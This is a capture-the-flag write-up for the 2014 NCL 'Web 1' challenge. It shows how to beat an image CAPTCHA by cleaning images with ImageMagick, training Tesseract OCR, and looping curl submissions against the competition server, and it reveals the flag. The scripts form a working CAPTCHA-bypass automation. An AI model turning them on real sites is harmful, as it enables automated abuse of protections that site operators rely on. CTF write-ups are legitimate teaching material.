2014 NCL Post Season Web 1 CAPTCHA Solution
The following solution is for the 2014 NCL Post Season event’s “Web 1” flag.
Requires:
Tesseract OCR v3.02
Image Magick
CURL
Bash
On Ubuntu 14.04 the Tesseract package exists, but due to a packaging error, none of the training tools so compiling is necessary. Compiling Tesseract 3.02 from source requires also downloading and compiling Leptonica 1.70. Compiling info can be found here: https://code.google.com/p/tesseract-ocr/wiki/Compiling
Cleaning up the CAPTCHA with ImageMagick is fairly easy after discovering the dark lines and noise can be eliminated with just two commands
# remove the dark lines convert captcha.png -opaque '#404040' cleaned_captcha.png
# remove blue noise convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png
Now, with the image cleaned up it is time for the OCR. Tesseract with the default English training files for the CAPTCHA’s font was returning about 90-95% accuracy. This would only get you 10-20 successful results before the counter would reset back to zero with only another 9,980 to go. It is time to train Tesseract for the CAPTCHA font.
Training Tesseract OCR is a manual multiple step process if you don’t have the font. With the font available, there is an automated solution. In this case, the font didn’t want to be found. Using Image Magick’s convert utility to append 20-30 of the cleaned up CAPTCHAs vertically allows you to train the most characters at one time. The first step to training is to create a box file from a TIF of failed CAPTCHAs. I explain later how to append them together.
tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 batch.nochop makebox
Using the utility Cowboxer (works in WINE), I was able to edit the box file and fix any mistakes Tesseract made. Now it is time to train Tesseract using the corrected box file.
tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 box.train
Now it is only a matter of running several other commands and copying the combined result file to the tessdata directory. For brevity’s sake I won’t describe what the commands do. More information can be found here: https://code.google.com/p/tesseract-ocr/wiki/TrainingTesseract3
echo "captcha 0 0 0 0 0" > font_properties unicharset_extractor eng.captcha.exp0.box # for 2nd training session and after include previous box files # unicharset_extractor eng.captcha.exp0.box eng.captcha.exp1.box eng.captcha.exp2.box shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr cntraining eng.captcha.exp0.tr # for 2nd training session and after includes previous training files # shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr # mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr # cntraining eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr mv shapetable eng.shapetable mv inttemp eng.inttemp mv pffmtable eng.pffmtable mv normproto eng.normproto combine_tessdata eng. cp eng.traineddata /usr/local/share/tessdata
Training Tesseract OCR with appended failed CAPTCHAs will help improve accuracy after the first training session.
# append failed CAPTCHAs vertically for training convert failed*.png -append eng.captcha.exp0.png # resize to 1000 pixel width while maintaining aspect ratio convert eng.captcha.exp0.png -resize 1000 eng.captcha.exp0.tif
After a few training sessions, the CAPTCHA failures are now at a much lesser rate, but not good enough to break 10,000 consecutive correct outputs. But during training with the failures, there were no errors. To emulate that, appending of the current CAPTCHA with additional ones was necessary before running through Tesseract. Then just pipe the output through the ‘tr’ and ‘cut’ commands to get the correct output.
CAPTCHA=`cat ocr_captcha_result.txt | tr -d '\n'| tr -d ' '| cut -c 1-6`
With Tesseract trained, it is now time to automate grabbing the CAPTCHA’s and decoding them.
for i in {0..10001} do if [ ${i} -lt 1 ]; then # start the session curl -b cookies.txt -c cookies.txt -k \ --data "username=user&password=test" \ https://23.23.158.181/signup.php continue; fi # submit captcha ocr value to server curl -b cookies.txt -c cookies.txt -k -X POST \ --data "input=${CAPTCHA}&flag=1&submit=submit" \ https://23.23.158.181/main.php # download new captcha from server curl -b cookies.txt -c cookies.txt -k \ https://23.23.158.181/captcha.png > captcha.png # remove the dark lines convert captcha.png -opaque '#404040' cleaned_captcha.png # remove blue noise convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png # append other cleaned captchas vertically to improve ocr accuracy convert cleaned_captcha.png \ additional_captcha.png \ additional_captcha_2.png \ -append ocr_captcha.png # increase size for ocr accuracy convert ocr_captcha.png -resize 1000 final_ocr_captcha.tif # run captcha through tesseract ocr tesseract -psm 6 final_ocr_captcha.tif ocr_captcha_result # clean up and grab only first captcha values CAPTCHA=`cat ocr_captcha_result.txt | tr -d '\n'| tr -d ' '| cut -c 1-6` done
At this point, you should be well on your way to 10,000 consecutive CAPTCHAs form submissions. If there is any issue with training failed ones, this code added added to the form submission line should help identify and save the failed CAPTCHAs for additional training.
# submit captcha ocr value to server curl -b cookies.txt -c cookies.txt -k -X POST \ --data "input=${CAPTCHA}&flag=1&submit=submit" \ https://23.23.158.181/main.php > flagdata.txt if grep -Fq "You have failed" flagdata.txt then echo "Failed captcha ${CAPTCHA}" cp captcha.png "failed-${CAPTCHA}.png" # will display the failed CAPTCHA using Image Magick's display command and keep the script running # comment this if experiencing a high failure rate display "failed-${CAPTCHA}.png" & fi
The looping video below shows the 9997, 9998, 9999, and 10000 solved solution:
Flag: MyVisionIs2020
Written and Solved by Ryan Lavelle